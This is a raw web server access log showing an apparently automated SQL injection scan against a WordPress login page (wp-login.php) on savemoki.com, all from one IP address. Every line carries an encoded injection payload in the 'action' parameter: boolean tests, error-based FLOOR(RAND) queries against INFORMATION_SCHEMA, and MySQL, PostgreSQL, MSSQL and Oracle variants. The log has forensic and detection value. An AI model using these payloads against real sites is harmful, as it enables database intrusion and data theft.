81.19.136.20 - - [04/Sep/2022:00:44:12 -0700] "GET /2test/wp-login.php?action=%27%29%20AND%207971%3D8776%20AND%20%28%27tjTE%27%3D%27tjTE&post_password= HTTP/1.1" 200 6056 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:13 -0700] "GET /2test/wp-login.php?action=%27%20AND%202447%3D8678%20AND%20%27gBva%27%3D%27gBva&post_password= HTTP/1.1" 200 6050 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:15 -0700] "GET /2test/wp-login.php?action=%27%20AND%208272%3D8272%20AND%20%27jLog%27%3D%27jLog&post_password= HTTP/1.1" 200 6056 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:17 -0700] "GET /2test/wp-login.php?action=%27%20AND%204084%3D6413%20AND%20%27jpaD%27%3D%27jpaD&post_password= HTTP/1.1" 200 6057 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:19 -0700] "GET /2test/wp-login.php?action=%25%27%20AND%209639%3D8222%20AND%20%27%25%27%3D%27&post_password= HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:21 -0700] "GET /2test/wp-login.php?action=%25%27%20AND%208272%3D8272%20AND%20%27%25%27%3D%27&post_password= HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:23 -0700] "GET /2test/wp-login.php?action=%25%27%20AND%203567%3D6141%20AND%20%27%25%27%3D%27&post_password= HTTP/1.1" 200 6056 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:36 -0700] "GET /2test/wp-login.php?action=%20AND%202823%3D5483--%20xmXd&post_password= HTTP/1.1" 200 6050 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:38 -0700] "GET /2test/wp-login.php?action=%20AND%208272%3D8272--%20Ygxy&post_password= HTTP/1.1" 200 6059 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:40 -0700] "GET /2test/wp-login.php?action=%20AND%204880%3D5348--%20qanY&post_password= HTTP/1.1" 200 6050 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:42 -0700] "GET /2test/wp-login.php?action=%28SELECT%20%28CASE%20WHEN%20%284447%3D3612%29%20THEN%204447%20ELSE%204447%2A%28SELECT%204447%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29&post_password= HTTP/1.1" 200 6054 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:44 -0700] "GET /2test/wp-login.php?action=%28SELECT%20%28CASE%20WHEN%20%289709%3D9709%29%20THEN%209709%20ELSE%209709%2A%28SELECT%209709%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29&post_password= HTTP/1.1" 200 6056 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:46 -0700] "GET /2test/wp-login.php?action=%28SELECT%20%28CASE%20WHEN%20%288555%3D8138%29%20THEN%208555%20ELSE%208555%2A%28SELECT%208555%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29&post_password= HTTP/1.1" 200 6054 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:48 -0700] "GET /2test/wp-login.php?action=%29%20AND%20%28SELECT%205106%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787171%2C%28SELECT%20%28ELT%285106%3D5106%2C1%29%29%29%2C0x717a717171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286582%3D6582&post_password= HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:50 -0700] "GET /2test/wp-login.php?action=%20AND%20%28SELECT%205106%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787171%2C%28SELECT%20%28ELT%285106%3D5106%2C1%29%29%29%2C0x717a717171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&post_password= HTTP/1.1" 200 6056 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:51 -0700] "GET /2test/wp-login.php?action=%27%29%20AND%20%28SELECT%205106%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787171%2C%28SELECT%20%28ELT%285106%3D5106%2C1%29%29%29%2C0x717a717171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27tHSd%27%3D%27tHSd&post_password= HTTP/1.1" 200 6057 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:53 -0700] "GET /2test/wp-login.php?action=%27%20AND%20%28SELECT%205106%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787171%2C%28SELECT%20%28ELT%285106%3D5106%2C1%29%29%29%2C0x717a717171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27lhAy%27%3D%27lhAy&post_password= HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:55 -0700] "GET /2test/wp-login.php?action=%25%27%20AND%20%28SELECT%205106%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787171%2C%28SELECT%20%28ELT%285106%3D5106%2C1%29%29%29%2C0x717a717171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27&post_password= HTTP/1.1" 200 6050 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:57 -0700] "GET /2test/wp-login.php?action=%20AND%20%28SELECT%205106%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787171%2C%28SELECT%20%28ELT%285106%3D5106%2C1%29%29%29%2C0x717a717171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20GArU&post_password= HTTP/1.1" 500 3030 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:58 -0700] "GET /2test/wp-login.php?action=%29%20AND%203065%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283065%3D3065%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%289109%3D9109&post_password= HTTP/1.1" 500 3182 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:44:59 -0700] "GET /2test/wp-login.php?action=%20AND%203065%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283065%3D3065%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29&post_password= HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:01 -0700] "GET /2test/wp-login.php?action=%27%29%20AND%203065%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283065%3D3065%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27OnZb%27%3D%27OnZb&post_password= HTTP/1.1" 200 6055 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:02 -0700] "GET /2test/wp-login.php?action=%27%20AND%203065%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283065%3D3065%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27LGkq%27%3D%27LGkq&post_password= HTTP/1.1" 200 6053 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:04 -0700] "GET /2test/wp-login.php?action=%25%27%20AND%203065%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283065%3D3065%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27&post_password= HTTP/1.1" 200 6054 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:06 -0700] "GET /2test/wp-login.php?action=%20AND%203065%3DCAST%28%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283065%3D3065%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20fBcC&post_password= HTTP/1.1" 500 3164 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:07 -0700] "GET /2test/wp-login.php?action=%29%20AND%206414%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286414%3D6414%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%281911%3D1911&post_password= HTTP/1.1" 500 2699 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:07 -0700] "GET /2test/wp-login.php?action=%20AND%206414%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286414%3D6414%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29&post_password= HTTP/1.1" 200 6052 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:09 -0700] "GET /2test/wp-login.php?action=%27%29%20AND%206414%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286414%3D6414%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%28%27pMYS%27%3D%27pMYS&post_password= HTTP/1.1" 500 2694 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:11 -0700] "GET /2test/wp-login.php?action=%27%20AND%206414%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286414%3D6414%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%27cgIo%27%3D%27cgIo&post_password= HTTP/1.1" 500 2698 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:11 -0700] "GET /2test/wp-login.php?action=%25%27%20AND%206414%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286414%3D6414%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%27%25%27%3D%27&post_password= HTTP/1.1" 200 6052 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:45:12 -0700] "GET /2test/wp-login.php?action=%20AND%206414%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286414%3D6414%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29--%20GrgN&post_password= HTTP/1.1" 200 6052 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:11 -0700] "GET /2test/wp-login.php?action=%20AND%206414%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%286414%3D6414%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29--%20GrgN&post_password= HTTP/1.1" 500 2699 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:13 -0700] "GET /2test/wp-login.php?action=%29%20AND%209260%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289260%3D9260%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%288509%3D8509&post_password= HTTP/1.1" 500 2700 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:13 -0700] "GET /2test/wp-login.php?action=%20AND%209260%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289260%3D9260%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29&post_password= HTTP/1.1" 500 3203 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:13 -0700] "GET /2test/wp-login.php?action=%27%29%20AND%209260%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289260%3D9260%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27WQTp%27%3D%27WQTp&post_password= HTTP/1.1" 500 2697 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:15 -0700] "GET /2test/wp-login.php?action=%27%20AND%209260%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289260%3D9260%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27FQyw%27%3D%27FQyw&post_password= HTTP/1.1" 500 2699 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:15 -0700] "GET /2test/wp-login.php?action=%25%27%20AND%209260%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289260%3D9260%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27&post_password= HTTP/1.1" 500 2699 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:15 -0700] "GET /2test/wp-login.php?action=%20AND%209260%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289260%3D9260%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20igqW&post_password= HTTP/1.1" 500 2698 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:16 -0700] "GET /2test/wp-login.php?action=%28SELECT%201176%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787171%2C%28SELECT%20%28ELT%281176%3D1176%2C1%29%29%29%2C0x717a717171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&post_password= HTTP/1.1" 500 2549 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:16 -0700] "GET /2test/wp-login.php?action=%28SELECT%20CONCAT%280x7176787171%2C%28SELECT%20%28ELT%287628%3D7628%2C1%29%29%29%2C0x717a717171%29%29&post_password= HTTP/1.1" 500 2351 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:16 -0700] "GET /2test/wp-login.php?action=%28SELECT%20%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287656%3D7656%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%29&post_password= HTTP/1.1" 500 2688 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:18 -0700] "GET /2test/wp-login.php?action=%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%282437%3D2437%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%29&post_password= HTTP/1.1" 500 2641 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:18 -0700] "GET /2test/wp-login.php?action=&post_password= HTTP/1.1" 500 2459 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:41 -0700] "GET /2test/wp-login.php?action=&post_password= HTTP/1.1" 500 2195 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:41 -0700] "GET /2test/wp-login.php?action=&post_password= HTTP/1.1" 500 2457 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
81.19.136.20 - - [04/Sep/2022:00:46:44 -0700] "GET /2test/wp-login.php?action=&post_password= HTTP/1.1" 500 2197 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2" "savemoki.com"
